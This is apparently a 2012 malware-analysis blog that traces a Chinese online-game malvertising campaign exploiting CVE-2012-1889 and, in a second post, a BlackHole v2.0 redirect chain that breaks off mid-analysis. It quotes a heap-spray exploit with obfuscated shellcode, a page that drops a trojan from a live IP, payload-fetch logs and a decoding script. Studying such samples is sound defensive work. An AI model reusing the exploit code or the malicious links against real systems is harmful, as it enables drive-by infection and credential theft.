Saturday, September 29, 2012

I actually wrote this first in Pastebin yesterday while "crusading" with #MalwareMustDie friends.
It is a malvertisement for a Chinese online game, served from the host below in Shanghai, China:

IP: 222.73.57.117
inetnum: 222.64.0.0 - 222.73.255.255
netname: CHINANET-SH
descr: CHINANET shanghai province network
descr: China Telecom
descr: No1,jin-rong Street
descr: Beijing 100032
country: CN
The domain is owned by a Chinese individual:
person: Wu Xiao Li
address: Room 805,61 North Si Chuan Road,Shanghai,200085,PRC
country: CN
phone: +86-21-63630562
fax-no: +86-21-63630566
e-mail: ip-admin@mail.online.sh.cn
nic-hdl: XI5-AP
mnt-by: MAINT-CHINANET-SH
changed: ip-admin@mail.online.sh.cn 20010510
source: APNIC
My posts in Pastebin are here--->>[PASTEBIN] and here--->>[PASTEBIN]
A lot of questions came up, so I am writing it up now. I am keeping this short.

I saw these infection URLs while checking spam; the first group leads to xop.html:
h00p://9be14ngfsd.pppdiy.com/jx/xop.html
h00p://9f515lzff3.pppdiy.com/xy/xop.html
h00p://9kpgfwqdrj.pppdiy.com/hx/xop.html
h00p://9mf9x3cl55.pppdiy.com/tl/xop.html
h00p://9spxqc71fa.pppdiy.com/jy/xop.html
h00p://s35fc3qiyl.pppdiy.com/wd/xop.html
h00p://s3ebb5z4sk.pppdiy.com/wd/xop.html
h00p://s52csz5u47.pppdiy.com/wd/xop.html
h00p://s5c2ouavle.pppdiy.com/ny/xop.html
h00p://s9inw8nkk9.pppdiy.com/yl/xop.html
h00p://74jjdqugds.pppdiy.com/zt/xop.html
h00p://75kay4lxj8.pppdiy.com/jy/xop.html
h00p://67ldbpbmmj.pppdiy.com/jy/xop.html
h00p://rq2e9k4ti8.pppdiy.com/xy/xop.html
h00p://rre11swub9.pppdiy.com/yh/xop.html
h00p://436p1bwt5s.pppdiy.com/wd/xop.html
h00p://4a41nvbsst.pppdiy.com/tl/xop.html
h00p://4bo1ocjpk9.pppdiy.com/wm/xop.html
h00p://4eb2c9aupa.pppdiy.com/hx/xop.html
h00p://4ekyz6afnh.pppdiy.com/jy/xop.html
h00p://4gjoqgnvym.pppdiy.com/jy/xop.html
h00p://4j4yxxyugh.pppdiy.com/wd/xop.html
h00p://4s2aqluitq.pppdiy.com/yl/xop.html
h00p://52jbsoqe53.pppdiy.com/ah/xop.html
h00p://rkiit9hy1a.pppdiy.com/zt/xop.html
h00p://rldq7secto.pppdiy.com/jy/xop.html
h00p://roapzl6ao6.pppdiy.com/yl/xop.html
h00p://rohws731yt.pppdiy.com/tl/xop.html
h00p://3q4cnllxe2.pppdiy.com/yl/xop.html
h00p://2e1t8v8z9v.pppdiy.com/zt/xop.html
h00p://2kqi7tk2tx.pppdiy.com/wd/xop.html
h00p://2nzysx8qfy.pppdiy.com/xy/xop.html
h00p://2pg54c2ay2.pppdiy.com/ty/xop.html
h00p://2tvypppa1t.pppdiy.com/jx/xop.html
h00p://2zaco8gjga.pppdiy.com/xy/xop.html
h00p://31fclefhp5.pppdiy.com/jy/xop.html
h00p://37fs5qo4q5.pppdiy.com/jy/xop.html
h00p://3p3sivfs1w.pppdiy.com/jy/xop.html
h00p://rceta3uznz.pppdiy.com/xy/xop.html
h00p://11a1tgjoav.pppdiy.com/wd/xop.html
h00p://quyi6g8jz8.pppdiy.com/zt/xop.html
h00p://r7ykgk31xl.pppdiy.com/ny/xop.html
h00p://r89i2jzv72.pppdiy.com/ah/xop.html
h00p://r8cvnadv11.pppdiy.com/jx/xop.html
h00p://r8v7by8hl7.pppdiy.com/wm/xop.html
h00p://r9mdp167ou.pppdiy.com/xy/xop.html
h00p://ra5dfl2dhp.pppdiy.com/tl/xop.html
h00p://q4u427a9d9.pppdiy.com/wl/xop.html
h00p://qbfjz6vs2b.pppdiy.com/ty/xop.html
h00p://qfckl9xclm.pppdiy.com/xy/xop.html
h00p://qoxvbbwxxv.pppdiy.com/jy/xop.html
h00p://qpm2jb8vds.pppdiy.com/xy/xop.html
h00p://qrbvhfpnfi.pppdiy.com/my/xop.html
h00p://qtxjsy4psn.pppdiy.com/wd/xop.html
h00p://ppmcnqlq4b.pppdiy.com/hx/xop.html
h00p://pnj1c3glru.pppdiy.com/wd/xop.html
h00p://pnrks68rrs.pppdiy.com/wd/xop.html
h00p://pn87z1eiaj.pppdiy.com/yl/xop.html
h00p://pcsssued3v.pppdiy.com/tl/xop.html
h00p://p2rb4o7xo3.pppdiy.com/ty/xop.html
h00p://p444fcmod8.pppdiy.com/jy/xop.html
h00p://oy3eewl8dj.pppdiy.com/wm/xop.html
h00p://z1v1awk14w.pppdiy.com/zx/xop.html
h00p://zlpr6v2wdp.pppdiy.com/wd/xop.html
h00p://zrxodxxsdb.pppdiy.com/jy/xop.html
h00p://x82ndlgusg.pppdiy.com/xy/xop.html
h00p://xgbex2gqur.pppdiy.com/wd/xop.html
h00p://xinfejn8sh.pppdiy.com/yh/xop.html
h00p://ypqdgh1spm.pppdiy.com/zx/xop.html
h00p://u3gltdtoo4.pppdiy.com/jy/xop.html
h00p://vev8ncrkcm.pppdiy.com/jx/xop.html
h00p://vlbujx6d19.pppdiy.com/xy/xop.html
h00p://vouludav9m.pppdiy.com/wd/xop.html
h00p://vqouin8qdg.pppdiy.com/wd/xop.html
h00p://ssx2pc47nw.pppdiy.com/ty/xop.html
h00p://sw29diefib.pppdiy.com/wd/xop.html
h00p://t1zsxal6p5.pppdiy.com/ty/xop.html
h00p://pq58ow6ydk.pppdiy.com/yl/xop.html
h00p://rlcensq6ds.pppdiy.com/wd/xop.html
h00p://s9ms36eb5q.pppdiy.com/ah/xop.html
h00p://p8t89f1q3x.pppdiy.com/xy/xop.html
h00p://pcsir3ijj9.pppdiy.com/zt/xop.html
h00p://pjv68ibarl.pppdiy.com/ah/xop.html
h00p://ow858ymp4d.pppdiy.com/xx/xop.html
h00p://opu3mx9u8s.pppdiy.com/tl/xop.html
h00p://o1v1ia7fzp.pppdiy.com/ah/xop.html
h00p://nq9k8bhtgy.pppdiy.com/tl/xop.html
h00p://mj3aqytgna.pppdiy.com/wd/xop.html
h00p://mkjbyf6vr8.pppdiy.com/xy/xop.html
h00p://lsjq1ic827.pppdiy.com/zt/xop.html
h00p://ln9jwxhwp2.pppdiy.com/jy/xop.html
h00p://kltudl7ixd.pppdiy.com/wd/xop.html
h00p://kb8ngrsrkt.pppdiy.com/zx/xop.html
h00p://jqqm6ksd4u.pppdiy.com/jx/xop.html
h00p://joez462a36.pppdiy.com/xy/xop.html
h00p://ir1mxyqbe1.pppdiy.com/jy/xop.html
h00p://hrwvzspefk.pppdiy.com/my/xop.html
h00p://hwwlnwoh5u.pppdiy.com/jx/xop.html
h00p://hehqxbhtrr.pppdiy.com/xy/xop.html
h00p://gzfuswbru9.pppdiy.com/xy/xop.html
h00p://gur1nihj4g.pppdiy.com/wd/xop.html
h00p://gcrbfl8iyi.pppdiy.com/jx/xop.html
h00p://fs12vmyw85.pppdiy.com/wd/xop.html
h00p://fs9kdc75dk.pppdiy.com/jy/xop.html
h00p://dxonfcd1zh.pppdiy.com/zt/xop.html
h00p://dfmta9juu5.pppdiy.com/ah/xop.html
h00p://di6uj6rqk3.pppdiy.com/jy/xop.html
h00p://85qcnilv1k.pppdiy.com/my/xop.html
h00p://4oy56fcvmg.pppdiy.com/jy/xop.html
h00p://x7zzmg5b1v.pppdiy.com/jx/xop.html
h00p://zgxx2raoak.pppdiy.com/jx/xop.html
h00p://wxf3mzd3zn.pppdiy.com/jx/xop.html
h00p://wzrkh2m8xl.pppdiy.com/xx/xop.html
h00p://uc18awkxod.pppdiy.com/my/xop.html
h00p://v2229jswhx.pppdiy.com/wd/xop.html
h00p://pxkxilbpos.pppdiy.com/wm/xop.html
h00p://rakwmwhpve.pppdiy.com/xy/xop.html
h00p://nsqjxjbfcs.pppdiy.com/ah/xop.html
h00p://ny5iceirim.pppdiy.com/jx/xop.html
h00p://iz5lh4r5qi.pppdiy.com/yl/xop.html
h00p://4fp9g7s3tr.pppdiy.com/xy/xop.html
h00p://57vcqwfb8a.pppdiy.com/jy/xop.html
h00p://oqlpdxtgux.pppdiy.com/zt/xop.html
h00p://ocd1bm7coa.pppdiy.com/xy/xop.html
h00p://od5aaz7m5e.pppdiy.com/jx/xop.html
h00p://odvn3j955e.pppdiy.com/zx/xop.html
h00p://ogd48fw2lt.pppdiy.com/tl/xop.html
h00p://oixgmmsng1.pppdiy.com/xy/xop.html
h00p://ntuhp4ou1t.pppdiy.com/yl/xop.html
h00p://oaicu6zotz.pppdiy.com/zt/xop.html
h00p://oannucq891.pppdiy.com/jx/xop.html
h00p://nmwlyg9jtd.pppdiy.com/xy/xop.html
h00p://nf8ri2a2ah.pppdiy.com/zt/xop.html
h00p://myx7rlgfgz.pppdiy.com/yl/xop.html
h00p://mzjqths79w.pppdiy.com/yl/xop.html
h00p://n19yfqnfgx.pppdiy.com/jy/xop.html
h00p://n318aq72eb.pppdiy.com/jy/xop.html
h00p://n3zxb481z3.pppdiy.com/yh/xop.html
h00p://n8dx15kr7y.pppdiy.com/xy/xop.html
h00p://muy6w1ufrw.pppdiy.com/jx/xop.html
h00p://mvhnrd8c9o.pppdiy.com/jy/xop.html
h00p://mvzn8qs8lg.pppdiy.com/wd/xop.html
h00p://mu5dptjoda.pppdiy.com/xy/xop.html
h00p://msogw56yis.pppdiy.com/xy/xop.html
And the others lead to index.html...
h00p://yzua8al89b.pppdiy.com/wd/index.html 
h00p://wjjxh168lj.pppdiy.com/wd/index.html
h00p://ki9hfgy8eb.pppdiy.com/wd/index.hmlt
h00p://9fnq4ekiqd.pppdiy.com/wd/index.html
h00p://agz5utxh9u.pppdiy.com/wd/index.html
h00p://nkkprh379v.pppdiy.com/wd/index.html
The index.html, as plainly written in its code, uses simple unobfuscated HTML/JavaScript to drop wd.exe, an online-game trojan info stealer. *) Dropping code:
<SPAN class=s1><A href="h00p://222.73.57.117/exe/wd.exe">ホハオタヌャタ、ヘ篁メ2.0-イサハユキム</A></SPAN>
<SPAN class=s4><SMALL><FONT style="COLOR: #c7b389">ヘニシ・/FONT></SMALL></SPAN>
<SPAN class=s2><font class="red"><script>sd--;document.write(sy+"-"+sm+"-"+sd);</script></font> <BR><FONT color=#b7b7b7><script>sh--;si--;ss--;document.write(sh+":"+si+":"+ss);</script></FONT></SPAN>
<SPAN class=s3><A href="h00p://222.73.57.117/exe/wd.exe">᾵リマツヤリ</A></SPAN>
<EM style="CLEAR: both; DISPLAY: block"></EM>
<P class=txt>ヒオテ・兤 վウ、カ・fヘニシトメۿ隆篁メ㬺òサコテモテìモテチヒイナヨʵ#。</P>
WD.EXE is currently a well-known, well-detected trojan, so I am not going to disclose it further. You can check it out in VirusTotal here:
MD5: 8e75d7855a5ae13da08ec21d7df673e7
File size: 32.0 KB ( 32768 bytes )
File name: 8E75D7855A5AE13DA08EC21D7DF673E7.bin
File type: Win32 EXE
Tags: peexe upx
Detection: 37 / 43
URL:------->[VIRUSTOTAL]
If we take a look into XOP.HTML, it has JavaScript to generate the exploit. I only snip some important parts, starting from the exploit initiation below:
heapLib.ie = function(maxAlloc, heapBase) {
this.maxAlloc = (maxAlloc ? maxAlloc : 65535);
this.heapBase = (heapBase ? heapBase : 0x150000);
this.paddingStr = "AAAA";
while (4 + this.paddingStr.length*2 + 2 < this.maxAlloc) {
this.paddingStr += this.paddingStr;
}
this.mem = new Array();
this.flushOleaut32();
...and see the rest of the code after that in the Pastebin here--->>[HERE]. I detected CVE-2012-1889, the MSXML bug patched in MS12-043, being used to get arbitrary command execution. In the browser log you can see the following:
[2012-09-30 17:46:47] [HTTP] URL: h00p://9be14ngfsd.pppdiy.com/jx/xop.html (Status: 200, Referrer: None)
[2012-09-30 17:46:48] <object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id="vwtI"></object>
[2012-09-30 17:46:48] ActiveXObject: F6D90F11-9C73-11D3-B32E-00C04F990BB4
[2012-09-30 17:46:48] <meta content="IE=7" http-equiv="X-UA-Compatible"/>
↑the object "clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" used is the PoC for CVE-2012-1889, which you can confirm at securityfocus.com-->>[HERE]. That CVE-2012-1889 was used to execute the evil shellcode generated here:
var heap_obj = new heapLib.ie(0x20000);
var sdgryyesc = "%uschwmd5db%uschwmc9c9%uschwm87cd%uschwm9292%uschwm8f8f%uschwm938f%uschwm8e8a%uschwm8893%uschwm938a%uschwm8c8c%uschwm928a%uschwmc5d8%uschwm92d8%uschwmc5d7%uschwmd893%uschwmd8c5%uschwmbdbd%uschwmbdbd";
var sdgryyev = (sdgryyesc.replace(/schwm/g,""));
var fdgertrepx = "%schwmuBschwmDBschwmD%uBDBschwmD%uBDBschwmD%uBDBD%uBDBschwmD%uBschwmDBD%uBDBschwmD%uBDBschwmD%uEAEA";
var fdgertrepx88 = (fdgertrepx.replace(/schwm/g,""));
var fdgertrepx99 = "%u54FF%uBEA3%uBDschwmBD%uD9E2%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD536%u36B5%uD74A%uE4AC%u0355%uBDBF%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%uB1FB%u0355%uschwmBDBC%u36BD%uD7schwm55%uE4B8%u2355%uBDBF%u5FBD%uD544%uD3D2%uBDBD%uC8D5%uD1CF%uE9D0%uAB42%u7D38%uAEC8%uD2D5%uBDD3%uD5BD%uCFC8%uD0D1%u36E9%uB1FB%u3355%uBDBC%u36BD%uD755%uE4BC%uD355%uBDBF%u5FBD%uD544%u8ED1%uBD8F%uCED5%uD8D5%uE9D1%uFB36%u55B1%uBCD2%uBDBD%u5536%uBCD7%u55E4%uBFF2%uBDBD%u445F%u513C%uBCBD%uBDBD%u6136%u7E3C%uBD3D%uBDBD%uBDschwmD7%uA7D7%uD7EE%u42BD%uE1EB%u7D8E%u3DFD%uBE81%uC8BD%u7A44%uBEB9%ufaE1%uD893%uF97A%uB9BE%uD8C5%uBDBD%u748E%uECEC%uEAEE%u8EEC%u367D%uE5FB%u9F55%uBDBC%u3EBD%uBD45%u1E54%uBDBD%u2DBD%uBDD7%uBDD7%uBED7%uBDD7%uBFD7%uBDD5%uBDBD%uEE7D%uFB36%u5599%uBCBC%uBDBD%uFB34%uD7DD%uEDschwmBD%uEB42%u3495%uD9FB%uFB36%uD7DD%uD7BD%uD7BD%uD7BD%uD7schwmB9%uEDBD%uEB42%uD791%uD7BD%uD7BD%uD5BD%uBDA2%uBschwmDB2%u42ED%u81EB%uFB34%u36C5%uD9F3%uC13D%u42B5%uC909%u3DB1%uB5C1%uBD42%uB8C9%uC93D%u42B5%u5F09%u3456%u3D3B%uBDBD%u7ABD%uCDFB%uBDBD%uBDBD%uFB7A%uBDC9%uBDBD%uD7schwmBD%uD7BD%uD7BD%u36BD%uDDFB%u42ED%u85EB%u3B36%uBD3D%uBDBD%uBDD7%uF330%uECC9%uCB42%uEDCD%uCB42%u42DD%u8DEB%uCBschwm42%u42DD%u89EB%uCB42%u42C5%uFDEB%u4636%u7D8E%u66schwm8E%u513C%uBFBD%uBDBD%u7136%u453E%uC0E9%u34Bschwm5%uBCA1%u7D3E%u56B9%u364E%u3671%u3E64%uAD7E%u7D8E%uECED%uEDEE%uEDschwmED%uEDED%uEAED%uEDED%uEB42%u36B5%uE9C3%uAD55%uBDBC%u55BD%uBDD8%uBDBD%uDED5%uCACB%uD5BD%uD5CE%uD2D9%u36E9%uB1FB%u9955%uBDBD%u34BD%u81FB%u1CD9%uBDschwmB9%uBDBD%u1D30%u42DD%u4242%uD8D7%uCB42%u3681%uADschwmFB%uB555%uBDBD%u8EBD%uEE66%uEEEE%u42EE%u3D6D%u55schwm85%u853D%uC854%u3CAC%uB8C5%u2D2D%u2D2D%uB5C9%u4236%u36E8%u3051%uB8FD%u5D42%u1Bschwm55%uBDBD%u7EBD%u1D55%uBDschwmBD%u0schwm5BD%uBCAC%u3DB9%uB17F%u55BD%uBD2E%uBDBD%u5schwm13C%uBCBD%uBDBD%u4136%u7A3E%u7AB9%u8FBA%u2CschwmC9%u7AB1%uB9FA%u34DE%uF26C%uFA7A%u1DB5%u2AschwmD8%u7A76%uB1FA%uFDEC%uC207%uFA7A%u83AD%u0BA0%u7A84%uA9FA%uD405%uA669%uFA7A%u03A5%uDBC2%u7A1D%uA1FA%u1441%u108A%uFA7A%u259D%uADB7%uD
945%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD5schwm36%u36B5%uD74A%uE4B9%uE955%uBDBD%u2DBD%u455F%u8schwmED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%u55BB%u42E8%u4242%u5536%uB8D7%u55E4%uBD88%uBDBD%u445F%u428E%u42schwmEA%uB9schwmEB%uBF56%u7EE5%u4455%u4242%uE642%uBA7B%u3405%schwmuBCE2%u7ADB%uB8FA%u5D42%uEE7E%u61schwm36%uD7EE%uD5FD%uADBD%uBDBD%u36EA%u9DFB%uA555%u4242%uE542%uEC7E%u36EB%u81C8%uC93schwm6%uC593%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%schwmuBE10%u8E78%uB266%uAD03%u6Bschwm87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286%u5AC8%u36E3%u99E3%u60BE%u36DB%uF6B1%uE336%uBEA1%u36schwm60%u3schwm6B9%u78schwmBE%uE316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u673E%uC6F5%u8F80%u2CC9%u38B1%u1262%uDE06%u6C34%uECF2%u07FD%u1DC2%u2AD8%uA376%uschwmD919%u2E5schwm2%u59schwm8F%u3329%uB7AE%u7F11%uF6A4%u79BC%uA230%uEAC9%uBschwm0DB%uFE42%u1103%uC066%u18schwm4D%uEF27%u1A43%u8367%u0BschwmA0%u0584%u69schwmD4%u03A6%uschwmDBC2%u411D%u8A14%u25schwm10%uschwmAschwmDB7%schwmu3D45%u12schwm6B%u4627%uA8EE";
var fdgertrepx98 = (fdgertrepx99.replace(/schwm/g,""));
var fdgertrepx123 = "%u58schwmayt58%u58schwmayt58%u10schwmaytEB%u4Bschwmayt5B%uC9schwmayt33%uB9schwmayt66%u03schwmaytB8%u34schwmayt80%uBDschwmayt0B%uFAE2%u05schwmaytEB%uEBschwmaytE8%uFFschwmaytFF";
var fdgertrepx1 = (fdgertrepx123.replace(/schwmayt/g,""));
var sdfetwedvz = "HJKS0c0"+"cHJKS0c"+"0c";
var code = unescape(fdgertrepx1+fdgertrepx98+sdgryyev+fdgertrepx88);
var nops = unescape(sdfetwedvz.replace(/HJKS/g,'%u'));
while (nops.length < 0x80000) nops += nops;
var offset = nops.substring(0, 0x100);
var shellc0de = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellc0de.length < 0x40000) shellc0de += shellc0de;
var block = shellc0de.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var z=1; z < 0x230; z++) {heap_obj.alloc(block);
Goes to this shellcode:

It can easily be brute-forced to give up the malicious URL. Some XOR effort will lead you to the strings:

h00p://[IP]/exe/[char].exe &jx
Put them together and you get:
h00p://222.73.57.117/exe/jx.exe
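The two analysis steps above (stripping the "schwm" junk token out of the %u-escaped string, then XOR-searching the resulting bytes for the URL) can be scripted instead of done by hand. The decoder stub in fdgertrepx123 is a short single-byte XOR loop, so trying all 256 keys and looking for "http://" is enough without disassembling anything. The Python below is an added example, not the kit's code or the author's; the URL http://192.0.2.1/exe/jx.exe and the key 0x5A in build_sample() are constructed test data, not the real sample's values.

```python
import re

JUNK = "schwm"  # junk token the kit strips at runtime with .replace(/schwm/g, "")


def strip_junk(js_string, junk=JUNK):
    """Remove the junk token that splits %uXXXX tokens apart for signature evasion."""
    return js_string.replace(junk, "")


def unescape_u(escaped):
    """Convert a %uXXXX / %XX escaped string into the bytes IE's unescape() lays out
    in memory: every %uXXXX is one UTF-16 code unit stored little-endian."""
    out = bytearray()
    for m in re.finditer(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})", escaped):
        if m.group(1):
            out += int(m.group(1), 16).to_bytes(2, "little")
        else:
            out.append(int(m.group(2), 16))
    return bytes(out)


def xor_search(blob, needle=b"http://"):
    """Try all 256 single-byte XOR keys; return (key, string) for each key that exposes
    needle, extending the match over the following printable bytes to get the whole URL."""
    hits = []
    for key in range(256):
        dec = bytes(b ^ key for b in blob)
        idx = dec.find(needle)
        if idx == -1:
            continue
        end = idx
        while end < len(dec) and 0x21 <= dec[end] <= 0x7E:
            end += 1
        hits.append((key, dec[idx:end].decode("ascii")))
    return hits


def recover_urls(js_string):
    """Full pipeline: strip junk -> unescape -> XOR brute force."""
    return xor_search(unescape_u(strip_junk(js_string)))


def build_sample(url="http://192.0.2.1/exe/jx.exe", key=0x5A):
    """CONSTRUCTED test data (not from the real sample): XOR the URL with a one-byte
    key, pad to an even length and emit it %u-escaped with the junk token sprinkled in."""
    data = url.encode("ascii") + b"\x00"
    if len(data) % 2:
        data += b"\x00"
    enc = bytes(b ^ key for b in data)
    parts = []
    for i in range(0, len(enc), 2):
        unit = enc[i] | (enc[i + 1] << 8)   # little-endian code unit, as unescape() stores it
        hexs = f"{unit:04X}"
        if (i // 2) % 3 == 0:               # junk inside every third token, as the kit does
            hexs = hexs[:2] + JUNK + hexs[2:]
        parts.append("%u" + hexs)
    return "".join(parts)


if __name__ == "__main__":
    sample = build_sample()
    print(sample)
    for key, url in recover_urls(sample):
        print(f"key=0x{key:02X} -> {url}")
```

xor_search reports every key that exposes the needle, so on a real blob a second hit usually means the URL appears twice or a different string happens to collide; checking that the recovered string is a sane URL before acting on it is the analyst's job.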
Since many asked me how I cracked this, here is a PoC snapshot. So let's move on and grab it:
--03:01:26--  h00p://222.73.57.117/exe/jx.exe
=> `jx.exe'
Connecting to 222.73.57.117:80... connected.
h00p request sent, awaiting response... 200 OK
Length: 48,128 (47K) [application/octet-stream]
Just look into the binary and you'll see many strange things:
// Malware OP traces...

000000002FE6 0000004047E6 0 MoveFileA
000000003032 000000404832 0 WriteFile
00000000303E 00000040483E 0 CreateFileA
00000000304C 00000040484C 0 WinExec
000000003074 000000404874 0 CopyFileA

// keystroke controlling...

0000000030C0 0000004048C0 0 GetKeyboardLayoutList
0000000030D8 0000004048D8 0 GetKeyboardLayoutNameA
0000000030F2 0000004048F2 0 ActivateKeyboardLayout
00000000310C 00000040490C 0 GetKeyboardLayout
000000003120 000000404920 0 LoadKeyboardLayoutA
000000003136 000000404936 0 UnloadKeyboardLayout

// IME Traces...

IMM32.dll.ImmGetDescriptionA Hint[0]
IMM32.dll.ImmInstallIMEA Hint[0]
IMM32.dll.ImmIsIME Hint[0]

// temp OPS data

00000000380C 00000040520C 0 %c:\Recycled\%d.tmp
000000003820 000000405220 0 %c:\RECYCLER\%d.tmp

// Crypter service..
00000000E05C 00000040FA5C 0 sc delete cryptsvc
00000000E070 00000040FA70 0 sc config cryptsvc start= disabled
00000000E094 00000040FA94 0 net stop cryptsvc

//registry added traces

00000000E0A8 00000040FAA8 0 %s%s%d.dll // kbdus.dll
00000000E0DC 00000040FADC 0 SOFTWARE\kingsoft\JX3\zhcn
00000000E0F8 00000040FAF8 0 JX3Client // JX3Client.exe
00000000E104 00000040FB04 0 Software\Microsoft\Windows\ShellNoRoam\MUICache
00000000E134 00000040FB34 0 %sdllcache\%s
00000000E144 00000040FB44 0 %syu%s // net1.exe
The behavior check shows:
//Drops
%Appdata%\JX3Client.exe
%System%\chinasougou.ime
%System%\yumidimap.dll
%System%\net1.exe

//Registry...(as per expected)
SOFTWARE\kingsoft\JX3\zhcn Value: "JX3Client.exe"

//Runs/control services:
net1.exe
sc.exe

//crypter service:
cryptsvc
It looks like an online game tool with trojan functions; it dumps your keystrokes. If you like online games, avoid using these tools. It looks like this, found on Chinese sites..: Currently VirusTotal has a good detection ratio for this:
MD5: bbfc347f66c1c361e7bd401f2f0d448e
File size: 47.0 KB ( 48128 bytes )
File name: sample
File type: Win32 EXE
Tags: peexe upx mz cve-2012-1889 exploit
Detection: 35 / 42
Analysis: 2012-09-29 19:16:46 UTC ( 8 hours, 20 minutes ago )
URL:------->>[VIRUSTOTAL]
With these malware names (NOTE that the original and unpacked binaries get very different names...sigh..):
First Check in VT: (PACKED/ORIGINAL BINARY)
-------------------------------------------
McAfee : Artemis!BBFC347F66C1
K7AntiVirus : Riskware
TheHacker : Posible_Worm32
F-Prot : W32/Heuristic-114!Eldorado
ESET-NOD32 : a variant of Win32/PSW.OnLineGames.QBF
TrendMicro-HouseCall : TROJ_GEN.RCBCEHF
Kaspersky : HEUR:Trojan.Win32.Generic
F-Secure : Dropped:Trojan.PWS.FakeIME.B
VIPRE : Trojan.Win32.Generic!BT
AntiVir : TR/ATRAPS.Gen
TrendMicro : TROJ_GEN.RCBCEHF
McAfee-GW-Edition : Artemis!BBFC347F66C1
Jiangmin : Trojan/Generic.algbo
Microsoft : PWS:Win32/Lolyda.BF
Commtouch : W32/Heuristic-114!Eldorado
AhnLab-V3 : Trojan/Win32.Xema
VBA32 : TrojanPSW.QQTen.ng
PCTools : Trojan.Gen
Ikarus : Trojan-PWS.Win32.Lolyda
Fortinet : W32/Onlinegames.QBF!tr
AVG : unknown virus Win32/DH{HhM6SEVn}
Panda : Suspicious file

First Check in VT: (UNPACKED)
-------------------------------
F-Secure : Dropped:Trojan.PWS.FakeIME.B
DrWeb : BackDoor.PcClient.5930
GData : Dropped:Trojan.PWS.FakeIME.B
Symantec : Suspicious.Cloud.5
Norman : W32/OnLineGames.NVOE
ESET-NOD32 : a variant of Win32/PSW.OnLineGames.QBF
eScan : Dropped:Trojan.PWS.FakeIME.B
Fortinet : W32/Onlinegames.QBF!tr
Emsisoft : Trojan-PWS.Win32.Lolyda!IK
VBA32 : TrojanPSW.QQTen.ng
Kaspersky : HEUR:Trojan.Win32.Generic
Jiangmin : Trojan/Generic.algbo
Rising : Trojan.Win32.Fednu.uhc
Ikarus : Trojan-PWS.Win32.Lolyda
AntiVir : TR/Crypt.ZPACK.Gen
AVG : unknown virus Win32/DH{HhM6SEVn}
Panda : Suspicious file
ViRobot : Trojan.Win32.A.PSW-Frethoq.51200
Comodo : TrojWare.Win32.Poison.QBF

Saturday, September 22, 2012

Firstly, special thanks to @it4sec for the first lead! This post is dedicated to all #MalwareMustDie members and supporters for being solid friends!

Assuming the current target is a BlackHole v2.0 infector online, we picked two URLs from a blacklist which lead to one infection. This is a story of peeling the threat. But before we continue, one more thing: this post is based on reversing we did while racing against time, so sorry if you are unhappy with the lack of details; please bear with it. Hope it is useful. Here we go:


We got the links below, which lead to the same infection case:
h00p://85.18.21.252/cKMXzC0n/index.html
h00p://85.18.21.252/SgcjN3i/index.html
(this information we picked up from a blacklist; contact me for the source..)
We fetched it:
h00p://85.18.21.252/cKMXzC0n/index.html
--14:18:35-- h00p://85.18.21.252/SgcjN3i/index.html
=> `index.html'
Connecting to 192.168.7.11:8118... connected.
Proxy request sent, awaiting response... 200 OK
Length: 418 [text/html]
14:18:37 (1.51 KB/s) - `index.html' saved [418/418]
and found the code below, which contains 4 (four) links to a js.js file...
<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="h00p://rolandpangrati.com/N65FCWa1/js.js"></script>
<script type="text/javascript" src="h00p://grupo-amaro.com/GpuVcKtR/js.js"></script>
<script type="text/javascript" src="h00p://www.laptopcolorat.com/zeScNpWp/js.js"></script>
<script type="text/javascript" src="h00p://grupocitometria.org.ar/ZfHxvN8N/js.js"></script>

</html>
Those js.js files are identical to one another (diff'ed them all), and look like the contents below...(to save space, I pasted only two)
--14:19:48--  h00p://rolandpangrati・com/N65FCWa1/js.js
=> `js.js'
Resolving rolandpangrati・com... 89.42.216.137
Connecting to rolandpangrati.com|89.42.216.137|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 73 [application/javascript]
14:19:49 (1.14 MB/s) - `js.js' saved [73/73]

$ cat js.js
document.location='h00p://69.194.192.2O3/links/anybody_miss-knowing.php';

--14:22:56-- http://www.laptopcolorat.com/zeScNpWp/js.js
=> `js.js.1'
Resolving www.laptopcolorat・com... 31.14.23.252
Connecting to www.laptopcolorat.com|31.14.23.252|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 73 [application/javascript]
14:22:57 (2.04 MB/s) - `js.js.1' saved [73/73]

$ cat js.js
document.location='h00p://69.194.192.2O3/links/anybody_miss-knowing.php';
↑So this is the link to the actual landing page (anybody_miss-knowing.php). We saw the obfuscated BlackHole PluginDetect v0.7.8 code written there: ↑the upper part was the obfuscated data, followed by the decoder logic. If you deobfuscate it well you'll get this "neutralized" code-->>[PASTEBIN]. The technique used in the obfuscation is to hide the data behind a "google" element, using tag attribute values to store the obfuscated data:
<u 
id="google"
d0="&4442494b46%3d42142o3o%453j3l3q2c^3h44…
d1="3q144449&403h3r3i14$3e15251645_3q3g3h3…
d2="e2525+163i453q3f@443l3r3q16+4d1g3l432r…
:
:
d93="23d1k1i(33423l443h(1c423d1m1i$423h434…
d94="423q^3r1d4b4d3g_3r3f453p3h$3q441i4742…>
</u>
↑Additional (2012 Sept 24th) log, IMPORTANT! Please note, for deobfuscation of the current sample, many automation schemes fail to deobfuscate it correctly or hang. This is because the obfuscation code separates the JavaScript calls it uses from the code itself; it is a simple string trick, yet it works to fool some signatures. In a similar sample we found the calls were put in variables like this:
<html><body><script>
g="getElementById";
ss=String.fromCharCode;
gg="getAttribute";</script>
..and there was also string manipulation to hide the eval() wording:
{window["e"+"v"+"a"+"l"](s);}
There is a step-by-step manual deobfuscation here:-->>[PASTEBIN] which can be used as a reference for patching many automation tools. While tracing the infection code of PluginDetect with the browser's logic, we will explain only 3 infection routes which can be simulated accordingly (by the time I got this hint, many objects couldn't be reached.. lack of evidence).

1. Java Exploitation

